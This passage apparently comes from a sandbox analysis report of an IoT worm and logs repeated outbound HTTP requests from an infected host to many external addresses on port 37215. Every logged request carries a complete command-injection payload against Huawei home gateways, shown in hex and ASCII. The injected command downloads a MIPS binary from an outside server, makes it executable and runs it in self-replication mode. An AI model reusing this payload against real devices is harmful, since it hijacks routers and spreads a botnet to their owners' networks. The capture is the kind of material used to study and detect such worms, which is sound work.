                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1540192.168.2.1536774157.20.136.7637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.905325890 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1541192.168.2.1547300197.47.124.12737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.905586004 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1542192.168.2.155095454.138.182.8637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.905596972 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1543192.168.2.1536372197.100.157.9737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.905621052 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1544192.168.2.154634841.34.76.24737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.905787945 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1545192.168.2.154689014.55.69.18937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.905803919 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1546192.168.2.155287692.77.254.6137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.910340071 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1547192.168.2.154647641.120.222.8137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.910662889 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1548192.168.2.1555332197.116.136.6037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:07.910902023 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1549192.168.2.1547120222.80.239.13337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:08.903093100 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 